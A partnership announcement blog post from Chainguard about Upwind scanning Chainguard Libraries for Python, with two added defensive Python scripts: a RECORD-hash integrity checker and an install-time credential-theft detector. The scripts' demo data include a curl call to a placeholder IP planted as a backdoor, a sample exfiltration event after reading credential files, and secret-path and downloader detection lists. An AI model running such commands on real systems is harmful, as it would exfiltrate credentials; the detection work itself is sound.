
Chainguard and Upwind: Secure what you build. Verify what you run.

Naveen Sharma, Vice President, Global Partnerships

They called it the year of the software supply chain.

Today, we’re excited to announce that Upwind now scans Chainguard Libraries for Python.

Recent software supply chain attacks have made one thing clear: attackers do not need CVEs to cause damage. The incidents involving the popular axios package and the Trivy security scanner did not rely on known, patchable vulnerabilities. They exploited trust in public registries by distributing malicious package versions that exfiltrated credentials and company data.

At the same time, frontier models like GPT-5.5 and Mythos are discovering new vulnerabilities faster than the average team can remediate. It's one of the reasons Chainguard is proud to be the first cybersecurity company to offer a one-calendar-day SLA for known exploited vulnerabilities (KEVs).

Security is now shifting further left. The focus for application security teams has moved from driving down CVE counts toward reducing the overall attack surface. To stay secure in 2026, teams need to start with open source artifacts that are malware-free and have zero CVEs.

Why current approaches fall short

Modern applications depend on large and changing sets of components. It is common for a single service to rely on hundreds or thousands of packages, many of which are updated frequently. Manual verification of these dependencies is not realistic at scale, and automated tools are designed primarily to detect known issues rather than establish trust.

Scanning continues to play an essential role, confirming that what is running in production is what was expected and that it is free of known issues. However, scanning can also produce a lot of unprioritized noise. Security teams spend significant time triaging alerts that may not be relevant to their actual runtime environment. At the same time, periodic scanning cannot capture short-lived workloads or changes that occur between scan intervals. This creates blind spots that are difficult to close using traditional approaches alone.

Runtime visibility is a critical layer of defense, showing exactly what code is active, which components are exposed to real risk, and what's actually exploitable in your environment. But runtime insights deliver the most value when the baseline environment is already as clean as possible. Without that foundation, teams are still left sifting through noise and trying to determine which signals matter. 

Trusted artifacts with runtime verification

A stronger model starts before the first line of code is written. It means starting with a secure-by-default set of open source artifacts that span your development needs.

Teams need confidence that the artifacts they start with are malware-free and have near-zero CVEs. That confidence then needs to be verified via scanning. This combination allows organizations to reduce risk at the source while continuously validating that production systems are operating as intended. That is the foundation of the Chainguard and Upwind partnership.

Chainguard delivers a full suite of open source artifacts that are trusted, verified, and secure: Chainguard Containers, Chainguard Libraries, Chainguard Actions, and Chainguard Agent Skills. These artifacts are built from source, and the build is designed so that the packaged artifact can be reproduced bit-for-bit from that source and traced back to it. By starting with components that are minimal, hardened, and verifiable, teams reduce the likelihood of introducing vulnerable or malicious artifacts into their environments.

Upwind provides deep visibility into what is actually happening with those artifacts and the rest of your code in production. Its runtime sensors observe which components are loaded, how services communicate, and which code paths are executed. This allows customers to distinguish what's actively reachable and exploitable from theoretical vulnerabilities that never touch production.

Runtime intelligence enables security teams to shrink alert volumes and focus remediation efforts where they matter most. Because Upwind maps remediation paths where a handful of fixes can resolve thousands of findings, security and engineering teams spend less time triaging alerts and more time building. 

Upwind now validates Chainguard Libraries

Upwind extends this model by delivering both scanning and runtime visibility across the software lifecycle. This now includes support for Chainguard Libraries for Python, enabling dependency scanning across environments regardless of whether applications are installed with pip, uv, or Poetry. Upwind's scanner now recognizes the critical and high-severity CVEs Chainguard remediates in older, harder-to-upgrade versions of Flask, Django, aiohttp, setuptools, and more, so those packages no longer show up as vulnerable once the Chainguard build is in use.

This integration allows joint customers to resolve the severe Python CVEs that have plagued their applications and have those resolutions quiet their Upwind scans. This gives your team more time to plan your next major version upgrade without carrying the major known vulnerabilities in your software in the meantime.
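Whichever installer produced a Python environment, the artifact left on disk carries its own integrity record: pip, uv, and Poetry all unpack wheels and write a RECORD file listing the sha256 of every installed file. The following script, added here as an illustration and not code from Chainguard or Upwind, checks an installed distribution against that RECORD so that a file modified or removed after installation is reported. It goes beyond the Chainguard Libraries case in the text to any installed wheel. The 'demopkg' distribution it lays out in a temporary directory is constructed for the demo.

```python
"""Check installed Python packages against the hashes their installer recorded.

Added example for this post; it is not Chainguard's or Upwind's code. Every
wheel installer (pip, uv, Poetry) writes a RECORD file into the package's
.dist-info directory listing the sha256 of each installed file, so the same
check works whichever tool did the install. The 'demopkg' distribution laid
out by build_demo_dist() is constructed here purely for the demo.
"""
import base64
import csv
import hashlib
import tempfile
from importlib.metadata import Distribution
from pathlib import Path


def record_hash(path: Path, algorithm: str = "sha256") -> str:
    """Hash a file the way RECORD encodes it: urlsafe base64 with '=' padding stripped."""
    digest = hashlib.new(algorithm, path.read_bytes()).digest()
    return base64.urlsafe_b64encode(digest).rstrip(b"=").decode("ascii")


def verify_installed_files(dist: Distribution) -> list[dict]:
    """Return one finding per RECORD entry whose file is missing or no longer matches.

    RECORD is parsed directly rather than via Distribution.files, because newer
    Python versions silently drop missing files from that property.
    Entries without a hash (RECORD itself, byte-compiled .pyc files) are
    skipped, as the wheel specification permits.
    """
    findings = []
    record = dist.read_text("RECORD") or ""
    for row in csv.reader(record.splitlines()):
        if not row:
            continue
        name = row[0]
        hash_spec = row[1] if len(row) > 1 else ""
        if not hash_spec:
            continue
        algorithm, _, expected = hash_spec.partition("=")
        target = Path(dist.locate_file(name))
        if not target.is_file():
            findings.append({"file": name, "problem": "missing"})
            continue
        actual = record_hash(target, algorithm)
        if actual != expected:
            findings.append({"file": name, "problem": "hash mismatch",
                             "expected": expected, "actual": actual})
    return findings


def build_demo_dist(site_dir: Path, tamper: str = "none") -> Distribution:
    """Lay out a minimal installed distribution 'demopkg 1.0' under site_dir.

    Constructed for the example to mirror what an installer leaves behind after
    unpacking a wheel. tamper="modify" rewrites the module after RECORD was
    written, as a post-install backdoor would; tamper="delete" removes it.
    """
    module = site_dir / "demopkg" / "__init__.py"
    module.parent.mkdir(parents=True, exist_ok=True)
    module.write_text("def hello():\n    return 'hi'\n")
    info = site_dir / "demopkg-1.0.dist-info"
    info.mkdir(exist_ok=True)
    (info / "METADATA").write_text("Metadata-Version: 2.1\nName: demopkg\nVersion: 1.0\n")
    lines = []
    for rel in ("demopkg/__init__.py", "demopkg-1.0.dist-info/METADATA"):
        path = site_dir / rel
        lines.append(f"{rel},sha256={record_hash(path)},{path.stat().st_size}")
    lines.append("demopkg-1.0.dist-info/RECORD,,")
    (info / "RECORD").write_text("\n".join(lines) + "\n")
    if tamper == "modify":
        module.write_text("import os\nos.system('curl https://203.0.113.10/c')\n")
    elif tamper == "delete":
        module.unlink()
    return Distribution.at(info)


def demo() -> dict:
    """Verify a clean, a modified and a deleted install; returns findings per case."""
    results = {}
    with tempfile.TemporaryDirectory() as tmp:
        for case in ("none", "modify", "delete"):
            dist = build_demo_dist(Path(tmp) / case, tamper=case)
            results[case] = verify_installed_files(dist)
    return results


if __name__ == "__main__":
    for case, findings in demo().items():
        print(f"{case:>7}: {findings or 'no findings'}")
```

To run the same check against a real environment, iterate `importlib.metadata.distributions()` and pass each distribution to `verify_installed_files`; a clean install returns an empty list, and a mismatch names the file together with the expected and observed hash.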

Beyond vulnerability reduction, Upwind provides an additional layer of protection against software supply chain threats that cannot be solved through package updates alone. Even trusted dependencies can become attack vectors through malicious package updates, compromised maintainers, poisoned transitive dependencies, or unexpected runtime behavior. Upwind’s deep runtime visibility has proven effective in detecting suspicious package execution, abnormal process behavior, unauthorized outbound communications, secret access, and other indicators of supply chain compromise in production. Together with Chainguard’s hardened libraries, customers benefit from both proactive risk reduction and runtime detection of threats that evade traditional dependency hygiene.
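The indicators listed above (suspicious package execution, abnormal child processes, unexpected outbound connections, secret access) are the footprint of the registry attacks mentioned at the start of this post, where a malicious package version read local credentials during installation and sent them out. The following script, added here as an illustration and not Upwind's detection logic, shows how those signals correlate: it builds the process tree from exec events, scopes the rules to processes running under an installer, and raises a high-severity alert only when the same process both reads a secret and talks to a host outside the package index allowlist. The event schema, the secret-path and index-host lists, and the sample events are all constructed for the demo.

```python
"""Flag the install-time credential-theft pattern behind recent registry attacks
by correlating process, file and network events from a package installation.

Added example for this post, not Upwind's detection logic. The event schema
(ts, type, pid, ppid, argv, path, host, port) and the sample events below are
constructed for the demo; a real runtime sensor (eBPF, auditd, EDR) supplies the
same facts in its own format.
"""
from collections import defaultdict
from fnmatch import fnmatch

# Installer commands whose process tree is expected to execute third-party code.
INSTALL_COMMANDS = {"pip", "pip3", "uv", "poetry"}
INSTALL_VERBS = {"install", "add", "sync"}

# Files an installer or build backend has no business reading (assumed list).
SECRET_GLOBS = (
    "*/.aws/credentials", "*/.npmrc", "*/.pypirc", "*/.docker/config.json",
    "*/.ssh/id_*", "*/.git-credentials", "*/.env", "*/.config/gh/hosts.yml",
)

# Hosts an installer is expected to reach; add your own package index here.
INDEX_HOSTS = {"pypi.org", "files.pythonhosted.org"}

# Binaries a build step rarely needs but exfiltration scripts reach for.
DOWNLOADERS = {"sh", "bash", "curl", "wget", "nc"}


def _basename(arg: str) -> str:
    return arg.rsplit("/", 1)[-1]


def is_installer(argv: list[str]) -> bool:
    """True for pip/uv/poetry invocations, including 'python -m pip install'."""
    args = list(argv)
    if len(args) > 2 and _basename(args[0]).startswith("python") and args[1] == "-m":
        args = args[2:]
    return bool(args) and _basename(args[0]) in INSTALL_COMMANDS and bool(INSTALL_VERBS & set(args))


def detect(events: list[dict], index_hosts: set[str] = INDEX_HOSTS) -> list[dict]:
    """Return alerts for secret reads, unexpected egress and shell spawns under an installer."""
    parent, roots = {}, set()
    for e in events:
        if e["type"] == "exec":
            parent[e["pid"]] = e["ppid"]
            if is_installer(e["argv"]):
                roots.add(e["pid"])

    def under_installer(pid: int) -> bool:
        seen = set()
        while pid in parent and pid not in seen:    # walk up to the tree's top (or a cycle)
            if pid in roots:
                return True
            seen.add(pid)
            pid = parent[pid]
        return False

    secrets, egress, alerts = defaultdict(list), defaultdict(list), []
    for e in events:
        if not under_installer(e["pid"]):
            continue                                 # unrelated workloads are out of scope
        if e["type"] == "open" and any(fnmatch(e["path"], g) for g in SECRET_GLOBS):
            secrets[e["pid"]].append(e["path"])
        elif e["type"] == "connect" and e["host"] not in index_hosts:
            egress[e["pid"]].append(f'{e["host"]}:{e["port"]}')
        elif e["type"] == "exec" and e["pid"] not in roots and _basename(e["argv"][0]) in DOWNLOADERS:
            alerts.append({"severity": "medium", "pid": e["pid"],
                           "rule": "shell_or_downloader_spawned_by_installer",
                           "detail": " ".join(e["argv"])})
    for pid in sorted(secrets.keys() | egress.keys()):
        if secrets[pid] and egress[pid]:             # read a secret AND reached a non-index host
            alerts.append({"severity": "high", "pid": pid, "rule": "secret_read_and_egress",
                           "detail": {"files": secrets[pid], "destinations": egress[pid]}})
        elif secrets[pid]:
            alerts.append({"severity": "medium", "pid": pid,
                           "rule": "secret_read_during_install", "detail": secrets[pid]})
        else:
            alerts.append({"severity": "low", "pid": pid,
                           "rule": "unexpected_egress_during_install", "detail": egress[pid]})
    return alerts


# Constructed sample: a CI job installs a package whose build step reads
# credentials and posts them to a TEST-NET address; an unrelated app (pid 200)
# legitimately reads the same credentials file and must not be flagged.
SAMPLE_EVENTS = [
    {"ts": 1, "type": "exec", "pid": 100, "ppid": 1, "argv": ["/usr/bin/python3", "-m", "pip", "install", "somepkg"]},
    {"ts": 2, "type": "connect", "pid": 100, "host": "files.pythonhosted.org", "port": 443},
    {"ts": 3, "type": "exec", "pid": 101, "ppid": 100, "argv": ["/usr/bin/python3", "setup.py", "install"]},
    {"ts": 4, "type": "open", "pid": 101, "path": "/home/ci/.aws/credentials"},
    {"ts": 5, "type": "open", "pid": 101, "path": "/home/ci/.npmrc"},
    {"ts": 6, "type": "exec", "pid": 102, "ppid": 101, "argv": ["/usr/bin/curl", "-s", "-X", "POST", "https://203.0.113.10/collect"]},
    {"ts": 7, "type": "connect", "pid": 101, "host": "203.0.113.10", "port": 443},
    {"ts": 8, "type": "exec", "pid": 200, "ppid": 1, "argv": ["/usr/bin/python3", "app.py"]},
    {"ts": 9, "type": "open", "pid": 200, "path": "/home/ci/.aws/credentials"},
    {"ts": 10, "type": "connect", "pid": 200, "host": "db.internal", "port": 5432},
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert["severity"].upper(), alert["pid"], alert["rule"], alert["detail"])
```

Scoping to the installer's process tree is what keeps the rule quiet: the application at pid 200 reads the same credentials file and makes its own connections, but it is not a descendant of an installer, so it produces nothing. The allowlist of index hosts is the one knob that needs local tuning, since a private mirror or the Chainguard Libraries index will otherwise appear as unexpected egress.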

What this partnership means for you

Platform and DevOps teams see reduced operational overhead. Starting with trusted artifacts means fewer disruptions from security findings later in the process. Teams can maintain development velocity while adopting components that are designed to be secure by default.

For security leaders, this approach provides a more complete and measurable view of risk. It connects decisions made during development with outcomes observed in production, enabling teams to verify not just what was deployed but what is actively running and reachable. This makes it easier to demonstrate progress, justify investments, and align teams around a shared understanding of security priorities.

Looking ahead

Software supply chains are becoming more complex, all while the pace of development continues to accelerate and the sophistication of attacks continues to increase. As agentic coding makes every system more dynamic, the gap between what is built and what actually runs in production grows wider. Organizations need security tools that account for both sides of that equation.

Combining trusted artifacts with runtime verification provides a path forward. It allows teams to reduce the likelihood of introducing risk while maintaining continuous awareness of how systems behave in real environments.

The most effective security strategies reduce risk before it enters the environment and continuously prove it with always-on runtime security. Chainguard and Upwind bring these capabilities together in a way that is built for the pace of modern development.

Secure what you build. Verify what you run.

Get in touch with our team to learn more.
